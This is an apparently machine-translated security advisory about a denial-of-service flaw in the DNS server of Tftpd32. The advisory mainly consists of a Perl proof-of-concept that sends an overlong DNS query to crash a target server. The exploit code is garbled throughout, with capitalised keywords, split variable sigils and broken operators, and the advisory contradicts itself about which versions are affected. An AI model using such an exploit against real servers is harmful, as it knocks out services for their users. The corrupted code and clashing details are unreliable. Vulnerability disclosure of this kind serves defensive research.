Tftpd32 DNS Server Denial of Service Vulnerability

Release date:
Updated on:

Affected Systems:
TFTPD32 TFTPD32 4.00
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53704

Tftpd32 is a TFTP and DHCP server on Windows.

A Denial-of-Service vulnerability exists in implementation of versions earlier than TFTPD32 4.00. the DNS server is bound to UDP port 53, but the domain option size is not verified. When sending more than 127 characters, attackers can exploit this vulnerability to cause server crashes.

<* Source: demonalex

Link: http://www.securityfocus.com/archive/1/522877
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Demonalex () provides the following test methods:

Proof Of Concept:
-----------------------------------------------------------
#! /Usr/bin/perl
Use IO: Socket;
Use Socket;
Use Math: BigInt;
$ | = 1;
$ Host = shift;
$ Port = shift | '53 ';
Die "usage: $0 \ $ host [\ $ port] \ n" if (! Defined ($ host ));
$ Target_ip = inet_aton ($ host );
$ Target = sockaddr_in ($ port, $ target_ip );
$ Crash = 'A' x128;
$ Transaction_id_count = 1;
Sub dns_struct_pack ($ ){
$ Domain = shift; # domain
$ Type = "\ x00 \ xff"; # dns_type = ANY
$ Transaction_id_count = 1 if ($ transaction_id_count & gt; 255 );
$ X = Math: BigInt-> new ($ transaction_id_count );
$ X = ~ S/0x //;
$ Transaction_id = sprintf ("\ x00". chr ($ x ));
$ Flag = "\ x01 \ x00 ";
$ Question = "\ x00 \ x01 ";
$ Answer_rrs = "\ x00 \ x00 ";
$ Authority_rrs = "\ x00 \ x00 ";
$ Additional_rrs = "\ x00 \ x00 ";
If ($ domain ne '0 '){
Undef ($ domain_length );
$ Domain_length = length ($ domain );
$ Y = Math: BigInt-> new ($ domain_length );
$ Y = ~ S/0x //;
$ Domain_length = chr ($ y );
}
$ Class = "\ x00 \ x01"; # IN
$ Transaction_id_count ++;
If ($ domain eq '0 '){
$ Packet_struct = "$ transaction_id ". "$ flag ". "$ question ". "$ answer_rrs ". "$ authority_rrs ". "$ additional_rrs ". "\ x00 ". "$ type ". "$ class ";
} Else {
$ Packet_struct = "$ transaction_id ". "$ flag ". "$ question ". "$ answer_rrs ". "$ authority_rrs ". "$ additional_rrs ". "$ domain_length ". "$ domain ".
"\ X00". "$ type". "$ class ";
}
Return $ packet_struct;
}
Print "Launch attack ...";
Socket (SOCK1, AF_INET, SOCK_DGRAM, 17 );
Send (SOCK1, & dns_struct_pack ($ crash), 0, $ target );
Close (SOCK1 );
Print "Finish! \ N ";
Exit (0 );
-----------------------------------------------------------

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

TFTPD32
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://tftpd32.jounin.net